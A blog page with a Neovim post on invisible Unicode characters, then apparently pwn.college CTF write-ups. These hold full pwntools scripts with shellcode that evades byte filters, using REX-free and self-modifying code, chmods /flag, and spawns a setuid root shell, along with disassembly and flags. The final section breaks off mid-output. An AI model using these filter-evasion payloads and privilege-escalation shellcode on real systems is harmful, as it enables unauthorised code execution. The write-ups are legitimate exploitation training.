Hello Navi

Tech, Security & Personal Notes

Posted on In Disqus:

Ever copy-pasted a code snippet from a browser (Gemini) into Neovim, only to see a strange + or a highlighted <U+00A0>? Why does your Python script throw a SyntaxError on a line that looks perfectly fine?

The answer lies in the “invisible” world of Unicode control characters. These characters were designed for typography, but they have become a nightmare for modern programmers.

1. The Most Common Culprit: NBSP (U+00A0)

U+00A0 (Non-Breaking Space) wasn’t invented to annoy programmers. In the world of Typography, it serves a very legitimate purpose.

Core Origin: Prevent Line Wrapping

In traditional word processing and browser rendering, a standard space (U+0020) is a “soft” break point. When a line is full, the system wraps the text at the space.

However, some word pairs should never be separated. NBSP tells the rendering engine: “These two words are bound together. If you can’t fit them both, move the entire block to the next line.

Proper Use Cases

  • Values & Units: 100 kg or 500 MHz. You don’t want 100 at the end of a line and kg at the start of the next.
  • Names & Titles: Mr. Anderson or Dr. Freeman.
  • Language Specifics: In French typography, characters like : or ! must be preceded by a space. To prevent the punctuation from being isolated on a new line, NBSP is used.

Why It’s a Coding Nightmare

Web developers and WYSIWYG editors (like Microsoft Word) often abuse &nbsp; to force indentation or spacing. Because browsers “collapse” multiple standard spaces (U+0020) into one, people use NBSP to create “hard” whitespace.

When you copy code from these sources, U+00A0 is carried over into your terminal. Python, Bash, and C are rigorous: they only recognize U+0020 as a valid syntax separator. Anything else is an “invalid character.”

2. Visualizing and Fixing NBSP in Neovim

If you use Neovim, you can expose these hidden characters by setting listchars.

Configuration (init.lua)

1
2
3
4
5
6
7
8
9
vim.opt.list = true -- Enable list mode to show invisible characters

vim.opt.listchars = {
    nbsp = '☠',     -- Highlight U+00A0 as a skull (or '✗', '⍽')
    trail = '·',    -- Show trailing spaces
    tab = '▸ ',     -- Make Tabs visible
    extends = '❯',  -- Show wrap indicators
    precedes = '❮',
}

The Quick Fix

To substitute all NBSP characters with normal spaces in the current buffer:

1
:%s/\%u00a0/ /g

3. The Hidden Menace: Zero-Width Characters (U+200B - U+200F)

If NBSP is a nuisance, Zero-Width Characters are the “shadow realm” of Unicode. These characters are completely invisible in most GUI editors but occupy bytes in your file.

Common Variants

  • <U+200B> Zero Width Space (ZWSP): A “potential” break point for long URLs or languages without natural spaces (like Thai).
  • <U+200C> Zero Width Non-Joiner (ZWNJ): Prevents characters from forming a ligature (e.g., stopping f and i from becoming ).
  • <U+200D> Zero Width Joiner (ZWJ): The “stitcher.” It combines multiple characters into one.
    • Emoji Magic: A “Woman Astronaut” (👩‍🚀) is actually Woman (👩) + ZWJ + Rocket (🚀).
    • Family: 👨‍👩‍👧‍👦 is a chain of 4 emojis connected by 3 ZWJs.
  • <U+200E> (LRM) & <U+200F> (RLM): Used to control Left-to-Right and Right-to-Left text direction in bi-directional (Bidi) text.

4. Why They Are Dangerous (The Invisible Threat)

  1. Syntax Error Hell: You copy a Python script, and it fails with SyntaxError: invalid character in identifier. The error is “invisible” because the zero-width character is hidden inside a variable name.
  2. Security (Homoglyph Attacks): Attackers can create two identical-looking URLs. github.com and github.com (with a hidden <U+200B>) can lead you to a phishing site.
  3. Invisible Fingerprinting: Some companies use combinations of zero-width characters to encode a “hidden watermark” or employee ID in sensitive documents. If you leak the text, they can extract the ID from the invisible characters.

5. The Neovim Purge: Clean Your Code

Neovim’s listchars will often render these as hex codes like <U+200B> if they aren’t explicitly handled, making them easy to spot.

To wipe your file of all zero-width “garbage” from U+200B to U+200F:

1
:%s/[\%u200B-\%u200F]//g

This regex matches the entire range of common zero-width control characters and deletes them instantly.

Conclusion

In the UNIX philosophy, content and presentation are separate. Relying on invisible characters to control layout is “soulless.” As a power user, your code should be clean, visible, and free of typography-bloat.

Keep your listchars on, and never trust a copy-paste from a browser blindly.

Posted on In Disqus:

ello ackersl!

Write and execute shellcode to read the flag, but your inputted data is filtered before execution.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
###
### Welcome to /challenge/ello-ackers!
###

This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them
as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will
practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing
other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.

Mapped 0x1000 bytes for shellcode at 0x29e93000!
Reading 0x1000 bytes from stdin.

Executing filter...

This challenge requires that your shellcode have no H bytes!

Failed filter at byte 2048!

在 ASCII 码中,H 的十六进制是 0x48。 在 x86-64 架构的机器码中,0x48REX.W 前缀。任何对 64 位寄存器(如 rax, rdi, rsi)进行操作的指令,汇编器基本都会给它加上 0x48 前缀。

比如:

  • mov rax, 0x3b -> 48 c7 c0 3b 00 00 00
  • add rdi, 8 -> 48 83 c7 08

x86-64 架构有一个特性:对 32 位寄存器(如 eax, edi)进行操作时,CPU 会自动将该寄存器的高 32 位清零,并且不需要 REX.W 前缀。所以,mov eax, 2 对应的机器码是 b8 02 00 00 00

Method 1: Get root shell (setuid)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#!/usr/bin/env python3
from pwn import *

context.update(arch="amd64", os="linux")
context.log_level = "debug"

target_binary = "/challenge/ello-ackers"

# get root shell(setuid)
shellcode_asm = """
.global _start
_start:
.intel_syntax noprefix
    xor edi, edi
    push 105
    pop rax
    syscall

    xor esi, esi
    push rsi
    push rsi
    push rsp
    pop rdi

    mov dword ptr [rdi], 0x6e69622f
    mov dword ptr [rdi+4], 0x68732f2f

    push 59
    pop rax

    xor edx, edx
    syscall
"""

payload = asm(shellcode_asm)
print(payload)

log.info(f"Payload len: {len(payload)} bytes")
log.info(f"Payload Hex dump: \n{enhex(payload)}")

if b"\x48" in payload:
    log.error("detected 0x48 bytes in payload")
    exit(1)

p = process(target_binary)
p.send(payload)
p.interactive()

Method 2: Read flag directly

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#!/usr/bin/env python3
from pwn import *

context.update(arch="amd64", os="linux")
context.log_level = "debug"

target_binary = "/challenge/ello-ackers"

shellcode_asm = """
.global _start
_start:
.intel_syntax noprefix
    xor esi, esi
    push rsi
    push rsp
    pop rdi

    mov dword ptr [rdi], 0x616c662f
    mov byte ptr [rdi+4], 0x67
    push 2
    pop rax
    syscall

    xchg eax, edi
    push rsp
    pop rsi
    mov dl, 100
    xor eax, eax
    syscall

    xchg eax, edx
    push 1
    pop rdi
    push 1
    pop rax
    syscall
"""

payload = asm(shellcode_asm)
print(payload)

log.info(f"Payload len: {len(payload)} bytes")
log.info(f"Payload Hex dump: \n{enhex(payload)}")

if b"\x48" in payload:
    log.error("detected 0x48 bytes in payload")
    exit(1)

p = process(target_binary)
p.send(payload)
p.interactive()
pwn.college{ogTy4tQHj3UmVxXesBT0tLjIPBx.0FMyIDL4cjM1gzW}

Syscall Smuggler

Write and execute shellcode to read the flag, but the inputted data cannot contain any form of system call bytes (syscall, sysenter, int), can you defeat this?

1
2
3
4
5
6
7
8
9
10
11
hacker@program-security~syscall-smuggler:~$ /challenge/syscall-smuggler ###
### Welcome to /challenge/syscall-smuggler!
###

This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them
as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will
practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing
other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.

Mapped 0x1000 bytes for shellcode at 0x1a467000!
Reading 0x1000 bytes from stdin.

Solution: SMC (Self-Modifying Code)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#!/usr/bin/env python3
from pwn import *

context.update(arch="amd64", os="linux")
context.log_level = "debug"

target_binary = "/challenge/syscall-smuggler"

shellcode_asm = """
.section .shellcode,"awx"
.global _start
.global __start
_start:
__start:
.intel_syntax noprefix
.p2align 0
    mov rax, 0x101010101010101
    push rax
    mov rax, 0x101010101010101 ^ 0x67616c662f
    xor [rsp], rax
    push 2
    pop rax
    mov rdi, rsp
    xor esi, esi
    inc byte ptr [rip + patch_target1 + 1]
patch_target1:
    .byte 0x0f
    .byte 0x04

    mov r10d, 0x7fffffff
    mov rsi, rax
    push 40
    pop rax
    push 1
    pop rdi
    cdq
    inc byte ptr [rip + patch_target + 1]
patch_target:
    .byte 0x0f
    .byte 0x04
"""

payload = asm(shellcode_asm)
print(payload)

log.info(f"Payload len: {len(payload)} bytes")
log.info(f"Payload Hex dump: \n{enhex(payload)}")

if b"\x0f05" in payload:
    log.error("detected syscall bytes in payload")
    exit(1)

p = process(target_binary)
p.send(payload)
p.interactive()
pwn.college{sxAngc7P16UniMHkxwySW6LiF3L.0VMyIDL4cjM1gzW}

Syscall Shenanigans

Write and execute shellcode to read the flag, but the inputted data cannot contain any form of system call bytes (syscall, sysenter, int), this challenge adds an extra layer of difficulty!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
hacker@program-security~syscall-shenanigans:~$ /challenge/syscall-shenanigans
###
### Welcome to /challenge/syscall-shenanigans!
###

This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them
as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will
practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing
other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.

Mapped 0x2000 bytes for shellcode at 0x229dc000!
Reading 0x2000 bytes from stdin.

This challenge requires that your shellcode does not have any `syscall`, 'sysenter', or `int` instructions. System calls
are too dangerous! This filter works by scanning through the shellcode for the following byte sequences: 0f05
(`syscall`), 0f34 (`sysenter`), and 80cd (`int`). One way to evade this is to have your shellcode modify itself to
insert the `syscall` instructions at runtime.

Removing write permissions from first 4096 bytes of shellcode. !!!!!!!!!!!!!!!!!

This challenge is about to execute the following shellcode:

      Address      |                      Bytes                    |          Instructions
------------------------------------------------------------------------------------------
0x00000000229dc000 | 48 b8 01 01 01 01 01 01 01 01                 | movabs rax, 0x101010101010101
0x00000000229dc00a | 50                                            | push rax
0x00000000229dc00b | 48 b8 2e 67 6d 60 66 01 01 01                 | movabs rax, 0x1010166606d672e
0x00000000229dc015 | 48 31 04 24                                   | xor qword ptr [rsp], rax
0x00000000229dc019 | 6a 02                                         | push 2
0x00000000229dc01b | 58                                            | pop rax
0x00000000229dc01c | 48 89 e7                                      | mov rdi, rsp
0x00000000229dc01f | 31 f6                                         | xor esi, esi
0x00000000229dc021 | fe 05 01 00 00 00                             | inc byte ptr [rip + 1]

Executing shellcode!

[*] Got EOF while reading in interactive
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#!/usr/bin/env python3
from pwn import *

context.update(arch="amd64", os="linux")
context.log_level = "debug"

target_binary = "/challenge/syscall-shenanigans"

shellcode_asm = """
.section .shellcode,"awx"
.global _start
.global __start
_start:
__start:
.intel_syntax noprefix
.p2align 0
    mov rax, 0x101010101010101
    push rax
    mov rax, 0x101010101010101 ^ 0x67616c662f
    xor [rsp], rax
    push 2
    pop rax
    mov rdi, rsp
    xor esi, esi
    inc byte ptr [rip + patch_target1 + 1]
patch_target1:
    .byte 0x0f
    .byte 0x04

    mov r10d, 0x7fffffff
    mov rsi, rax
    push 40
    pop rax
    push 1
    pop rdi
    cdq
    inc byte ptr [rip + patch_target + 1]
patch_target:
    .byte 0x0f
    .byte 0x04
"""

payload = b"\x90" * 4096

payload += asm(shellcode_asm)

# log.info(f"Payload len: {len(payload)} bytes")
# log.info(f"Payload Hex dump: \n{enhex(payload)}")

if b"\x0f05" in payload:
    log.error("detected syscall bytes in payload")
    exit(1)

p = process(target_binary)
p.send(payload)
p.interactive()
pwn.college{sgSXh_BFf5M_15STVO05hkTbwud.0lMyIDL4cjM1gzW}

Byte Budget

Write and execute shellcode to read the flag, but you only get 18 bytes.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
hacker@program-security~byte-budget:~$ /challenge/byte-budget
###
### Welcome to /challenge/byte-budget!
###

This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them
as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will
practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing
other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.

Mapped 0x1000 bytes for shellcode at 0x14f5f000!
Reading 0x12 bytes from stdin.

Removing write permissions from first 4096 bytes of shellcode.

Disassembly analysis

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
r2 -A -q -c "pdf @ sym.main" /challenge/byte-budget

            ; ICOD XREF from entry0 @ 0x1241(r)
┌ 727: int main (int argc, char **argv, char **envp);
│ `- args(rdi, rsi, rdx) vars(6:sp[0x10..0x40])
│           0x00001567      f30f1efa       endbr64
│           0x0000156b      55             push rbp
│           0x0000156c      4889e5         mov rbp, rsp
│           0x0000156f      4883ec40       sub rsp, 0x40
│           0x00001573      897ddc         mov dword [var_24h], edi    ; argc
│           0x00001576      488975d0       mov qword [var_30h], rsi    ; argv
│           0x0000157a      488955c8       mov qword [var_38h], rdx    ; envp
│           0x0000157e      488b059b2a..   mov rax, qword [obj.stdin]  ; obj.stdin__GLIBC_2.2.5
│                                                                      ; [0x4020:8]=0
│           0x00001585      b900000000     mov ecx, 0                  ; size_t size
│           0x0000158a      ba02000000     mov edx, 2                  ; int mode
│           0x0000158f      be00000000     mov esi, 0                  ; char *buf
│           0x00001594      4889c7         mov rdi, rax                ; FILE*stream
│           0x00001597      e844fcffff     call sym.imp.setvbuf        ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
│           0x0000159c      488b056d2a..   mov rax, qword [obj.stdout] ; obj.__TMC_END__
│                                                                      ; [0x4010:8]=0
│           0x000015a3      b900000000     mov ecx, 0                  ; size_t size
│           0x000015a8      ba02000000     mov edx, 2                  ; int mode
│           0x000015ad      be00000000     mov esi, 0                  ; char *buf
│           0x000015b2      4889c7         mov rdi, rax                ; FILE*stream
│           0x000015b5      e826fcffff     call sym.imp.setvbuf        ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
│           0x000015ba      488d3d040c..   lea rdi, [0x000021c5]       ; "###" ; const char *s
│           0x000015c1      e87afbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000015c6      488b45d0       mov rax, qword [var_30h]
│           0x000015ca      488b00         mov rax, qword [rax]
│           0x000015cd      4889c6         mov rsi, rax
│           0x000015d0      488d3df20b..   lea rdi, str._Welcome_to__s__n ; 0x21c9 ; "### Welcome to %s!\n" ; const char *format
│           0x000015d7      b800000000     mov eax, 0
│           0x000015dc      e89ffbffff     call sym.imp.printf         ; int printf(const char *format)
│           0x000015e1      488d3ddd0b..   lea rdi, [0x000021c5]       ; "###" ; const char *s
│           0x000015e8      e853fbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000015ed      bf0a000000     mov edi, 0xa                ; int c
│           0x000015f2      e839fbffff     call sym.imp.putchar        ; int putchar(int c)
│           0x000015f7      488d3de20b..   lea rdi, str.This_challenge_reads_in_some_bytes__modifies_them__depending_on_the_specific_challenge_configuration___and_executes_them ; 0x21e0 ; "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them" ; const char *s
│           0x000015fe      e83dfbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x00001603      488d3d560c..   lea rdi, str.as_code__This_is_a_common_exploitation_scenario__called__code_injection_._Through_this_series_of_challenges__you_will ; 0x2260 ; "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will" ; const char *s
│           0x0000160a      e831fbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x0000160f      488d3dc20c..   lea rdi, str.practice_your_shellcode_writing_skills_under_various_constraints__To_ensure_that_you_are_shellcoding__rather_than_doing ; 0x22d8 ; "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing" ; const char *s
│           0x00001616      e825fbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x0000161b      488d3d2e0d..   lea rdi, str.other_tricks__this_will_sanitize_all_environment_variables_and_arguments_and_close_all_file_descriptors___2._n ; 0x2350 ; "other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n" ; const char *s
│           0x00001622      e819fbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x00001627      c745ec0300..   mov dword [fildes], 3
│       ┌─< 0x0000162e      eb0e           jmp 0x163e
│       │   ; CODE XREF from main @ 0x1645(x)
│      ┌──> 0x00001630      8b45ec         mov eax, dword [fildes]
│      ╎│   0x00001633      89c7           mov edi, eax                ; int fildes
│      ╎│   0x00001635      e876fbffff     call sym.imp.close          ; int close(int fildes)
│      ╎│   0x0000163a      8345ec01       add dword [fildes], 1
│      ╎│   ; CODE XREF from main @ 0x162e(x)
│      ╎└─> 0x0000163e      817dec0f27..   cmp dword [fildes], 0x270f  ; '\x0f\''
│      └──< 0x00001645      7ee9           jle 0x1630
│           0x00001647      488b45d0       mov rax, qword [var_30h]
│           0x0000164b      488945f0       mov qword [s], rax
│       ┌─< 0x0000164f      eb2b           jmp 0x167c
│       │   ; CODE XREF from main @ 0x1686(x)
│      ┌──> 0x00001651      488b45f0       mov rax, qword [s]
│      ╎│   0x00001655      488b00         mov rax, qword [rax]
│      ╎│   0x00001658      4889c7         mov rdi, rax                ; const char *s
│      ╎│   0x0000165b      e800fbffff     call sym.imp.strlen         ; size_t strlen(const char *s)
│      ╎│   0x00001660      4889c2         mov rdx, rax                ; size_t n
│      ╎│   0x00001663      488b45f0       mov rax, qword [s]
│      ╎│   0x00001667      488b00         mov rax, qword [rax]
│      ╎│   0x0000166a      be00000000     mov esi, 0                  ; int c
│      ╎│   0x0000166f      4889c7         mov rdi, rax                ; void *s
│      ╎│   0x00001672      e829fbffff     call sym.imp.memset         ; void *memset(void *s, int c, size_t n)
│      ╎│   0x00001677      488345f008     add qword [s], 8
│      ╎│   ; CODE XREF from main @ 0x164f(x)
│      ╎└─> 0x0000167c      488b45f0       mov rax, qword [s]
│      ╎    0x00001680      488b00         mov rax, qword [rax]
│      ╎    0x00001683      4885c0         test rax, rax
│      └──< 0x00001686      75c9           jne 0x1651
│           0x00001688      488b45c8       mov rax, qword [var_38h]
│           0x0000168c      488945f8       mov qword [var_8h], rax
│       ┌─< 0x00001690      eb2b           jmp 0x16bd
│       │   ; CODE XREF from main @ 0x16c7(x)
│      ┌──> 0x00001692      488b45f8       mov rax, qword [var_8h]
│      ╎│   0x00001696      488b00         mov rax, qword [rax]
│      ╎│   0x00001699      4889c7         mov rdi, rax                ; const char *s
│      ╎│   0x0000169c      e8bffaffff     call sym.imp.strlen         ; size_t strlen(const char *s)
│      ╎│   0x000016a1      4889c2         mov rdx, rax                ; size_t n
│      ╎│   0x000016a4      488b45f8       mov rax, qword [var_8h]
│      ╎│   0x000016a8      488b00         mov rax, qword [rax]
│      ╎│   0x000016ab      be00000000     mov esi, 0                  ; int c
│      ╎│   0x000016b0      4889c7         mov rdi, rax                ; void *s
│      ╎│   0x000016b3      e8e8faffff     call sym.imp.memset         ; void *memset(void *s, int c, size_t n)
│      ╎│   0x000016b8      488345f808     add qword [var_8h], 8
│      ╎│   ; CODE XREF from main @ 0x1690(x)
│      ╎└─> 0x000016bd      488b45f8       mov rax, qword [var_8h]
│      ╎    0x000016c1      488b00         mov rax, qword [rax]
│      ╎    0x000016c4      4885c0         test rax, rax
│      └──< 0x000016c7      75c9           jne 0x1692
│           0x000016c9      41b900000000   mov r9d, 0                  ; size_t offset
│           0x000016cf      41b800000000   mov r8d, 0                  ; int fd
│           0x000016d5      b922000000     mov ecx, 0x22               ; '\"' ; int flags
│           0x000016da      ba07000000     mov edx, 7                  ; int prot
│           0x000016df      be00100000     mov esi, sym._init          ; 0x1000 ; size_t length
│           0x000016e4      bf00f0f514     mov edi, 0x14f5f000         ; void*addr
│           0x000016e9      e882faffff     call sym.imp.mmap           ; void*mmap(void*addr, size_t length, int prot, int flags, int fd, size_t offset)
│           0x000016ee      4889054329..   mov qword [obj.shellcode], rax ; [0x4038:8]=0
│           0x000016f5      488b053c29..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x000016fc      483d00f0f514   cmp rax, 0x14f5f000
│       ┌─< 0x00001702      741f           je 0x1723
│       │   0x00001704      488d0d360e..   lea rcx, obj.__PRETTY_FUNCTION__.25265 ; 0x2541 ; "main" ; const char *function
│       │   0x0000170b      ba62000000     mov edx, 0x62               ; 'b' ; unsigned int line
│       │   0x00001710      488d35a90c..   lea rsi, str._challenge_babyshell_level_8.c ; 0x23c0 ; "/challenge/babyshell-level-8.c" ; const char *file
│       │   0x00001717      488d3dc20c..   lea rdi, str.shellcode___void__0x14f5f000 ; str.shellcode___void__0x14f5f000
│       │                                                              ; 0x23e0 ; "shellcode == (void *)0x14f5f000" ; const char *assertion
│       │   0x0000171e      e86dfaffff     call sym.imp.__assert_fail  ; void __assert_fail(const char *assertion, const char *file, unsigned int line, const char *function)
│       │   ; CODE XREF from main @ 0x1702(x)
│       └─> 0x00001723      488b050e29..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x0000172a      4889c6         mov rsi, rax
│           0x0000172d      488d3dcc0c..   lea rdi, str.Mapped_0x1000_bytes_for_shellcode_at__p__n ; str.Mapped_0x1000_bytes_for_shellcode_at__p__n
│                                                                      ; 0x2400 ; "Mapped 0x1000 bytes for shellcode at %p!\n" ; const char *format
│           0x00001734      b800000000     mov eax, 0
│           0x00001739      e842faffff     call sym.imp.printf         ; int printf(const char *format)
│           0x0000173e      488d3deb0c..   lea rdi, str.Reading_0x12_bytes_from_stdin._n ; str.Reading_0x12_bytes_from_stdin._n
│                                                                      ; 0x2430 ; "Reading 0x12 bytes from stdin.\n" ; const char *s
│           0x00001745      e8f6f9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x0000174a      488b05e728..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x00001751      ba12000000     mov edx, 0x12               ; size_t nbyte
│           0x00001756      4889c6         mov rsi, rax                ; void *buf
│           0x00001759      bf00000000     mov edi, 0                  ; int fildes
│           0x0000175e      e85dfaffff     call sym.imp.read           ; ssize_t read(int fildes, void *buf, size_t nbyte)
│           0x00001763      488905c628..   mov qword [obj.shellcode_size], rax ; [0x4030:8]=0
│           0x0000176a      488b05bf28..   mov rax, qword [obj.shellcode_size] ; [0x4030:8]=0
│           0x00001771      4885c0         test rax, rax
│       ┌─< 0x00001774      751f           jne 0x1795
│       │   0x00001776      488d0dc40d..   lea rcx, obj.__PRETTY_FUNCTION__.25265 ; 0x2541 ; "main" ; const char *function
│       │   0x0000177d      ba67000000     mov edx, 0x67               ; 'g' ; unsigned int line
│       │   0x00001782      488d35370c..   lea rsi, str._challenge_babyshell_level_8.c ; 0x23c0 ; "/challenge/babyshell-level-8.c" ; const char *file
│       │   0x00001789      488d3dc00c..   lea rdi, str.shellcode_size___0 ; 0x2450 ; "shellcode_size > 0" ; const char *assertion
│       │   0x00001790      e8fbf9ffff     call sym.imp.__assert_fail  ; void __assert_fail(const char *assertion, const char *file, unsigned int line, const char *function)
│       │   ; CODE XREF from main @ 0x1774(x)
│       └─> 0x00001795      488d3dcc0c..   lea rdi, str.Removing_write_permissions_from_first_4096_bytes_of_shellcode._n ; 0x2468 ; "Removing write permissions from first 4096 bytes of shellcode.\n" ; const char *s
│           0x0000179c      e89ff9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000017a1      488b059028..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x000017a8      ba05000000     mov edx, 5
│           0x000017ad      be00100000     mov esi, sym._init          ; 0x1000
│           0x000017b2      4889c7         mov rdi, rax
│           0x000017b5      e846faffff     call sym.imp.mprotect
│           0x000017ba      85c0           test eax, eax
│       ┌─< 0x000017bc      741f           je 0x17dd
│       │   0x000017be      488d0d7c0d..   lea rcx, obj.__PRETTY_FUNCTION__.25265 ; 0x2541 ; "main" ; const char *function
│       │   0x000017c5      ba6a000000     mov edx, 0x6a               ; 'j' ; unsigned int line
│       │   0x000017ca      488d35ef0b..   lea rsi, str._challenge_babyshell_level_8.c ; 0x23c0 ; "/challenge/babyshell-level-8.c" ; const char *file
│       │   0x000017d1      488d3dd00c..   lea rdi, str.mprotect_shellcode__4096__PROT_READPROT_EXEC___0 ; 0x24a8 ; "mprotect(shellcode, 4096, PROT_READ|PROT_EXEC) == 0" ; const char *assertion
│       │   0x000017d8      e8b3f9ffff     call sym.imp.__assert_fail  ; void __assert_fail(const char *assertion, const char *file, unsigned int line, const char *function)
│       │   ; CODE XREF from main @ 0x17bc(x)
│       └─> 0x000017dd      488d3dfc0c..   lea rdi, str.This_challenge_is_about_to_execute_the_following_shellcode:_n ; 0x24e0 ; "This challenge is about to execute the following shellcode:\n" ; const char *s
│           0x000017e4      e857f9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000017e9      488b154028..   mov rdx, qword [obj.shellcode_size] ; [0x4030:8]=0
│           0x000017f0      488b054128..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x000017f7      4889d6         mov rsi, rdx                ; int64_t arg2
│           0x000017fa      4889c7         mov rdi, rax                ; int64_t arg1
│           0x000017fd      e807fbffff     call sym.print_disassembly
│           0x00001802      488d3d140d..   lea rdi, [0x0000251d]       ; const char *s
│           0x00001809      e832f9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x0000180e      488d3d090d..   lea rdi, str.Executing_shellcode__n ; 0x251e ; "Executing shellcode!\n" ; const char *s
│           0x00001815      e826f9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x0000181a      488b051728..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
# shellcode in rdx
│           0x00001821      4889c2         mov rdx, rax
│           0x00001824      b800000000     mov eax, 0
│           0x00001829      ffd2           call rdx
│           0x0000182b      488d3d020d..   lea rdi, str._Goodbye_      ; 0x2534 ; "### Goodbye!" ; const char *s
│           0x00001832      e809f9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x00001837      b800000000     mov eax, 0
│           0x0000183c      c9             leave
└           0x0000183d      c3             ret

程序在 call shellcode 之前,把 shellcode 的起始地址 (0x14f5f000) 塞进了 rdx 寄存器里。

可以直接把字符串硬编码在指令的末尾,然后用 rdx 来获取 ASCII 字符串的地址。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#!/usr/bin/env python3
from pwn import *

context.update(arch="amd64", os="linux")
context.log_level = "debug"

target_binary = "/challenge/byte-budget"

# syscall chmod
payload_asm = """
.intel_syntax noprefix
    lea rdi, [rdx + 12]
    push 4
    pop rsi
    push 90
    pop rax
    syscall
.ascii "/flag"
"""

payload = asm(payload_asm)
log.info(f"Payload length: {len(payload)} bytes (Arch Way Minimal!)")

p = process(target_binary)
p.send(payload)

p.wait()

import os

os.system("cat /flag")
pwn.college{c0WCX5hfQ61Xr0NdbS8GG93279M.0FNyIDL4cjM1gzW}

ClobberCode

Write and execute shellcode to read the flag, but this time your shellcode is partially overwritten with 0xcc (INT 3) every other 10 bytes.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
hacker@program-security~clobbercode:~$ /challenge/clobbercode
###
### Welcome to /challenge/clobbercode!
###

This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them
as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will
practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing
other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.

Mapped 0x1000 bytes for shellcode at 0x2e692000!
Reading 0x1000 bytes from stdin.

This challenge modified your shellcode by overwriting every other 10 bytes with 0xcc. 0xcc, when interpreted as an
instruction is an `INT 3`, which is an interrupt to call into the debugger. You must avoid these modifications in your
shellcode.

Removing write permissions from first 4096 bytes of shellcode.

This challenge is about to execute the following shellcode:

      Address      |                      Bytes                    |          Instructions
------------------------------------------------------------------------------------------
0x000000002e692000 | 31 ff                                         | xor edi, edi
0x000000002e692002 | 6a 69                                         | push 0x69
0x000000002e692004 | 58                                            | pop rax
0x000000002e692005 | 0f 05                                         | syscall
0x000000002e692007 | 31 f6                                         | xor esi, esi
0x000000002e692009 | 56                                            | push rsi
0x000000002e69200a | cc                                            | int3
0x000000002e69200b | cc                                            | int3
0x000000002e69200c | cc                                            | int3
0x000000002e69200d | cc                                            | int3
0x000000002e69200e | cc                                            | int3
0x000000002e69200f | cc                                            | int3
0x000000002e692010 | cc                                            | int3
0x000000002e692011 | cc                                            | int3
0x000000002e692012 | cc                                            | int3
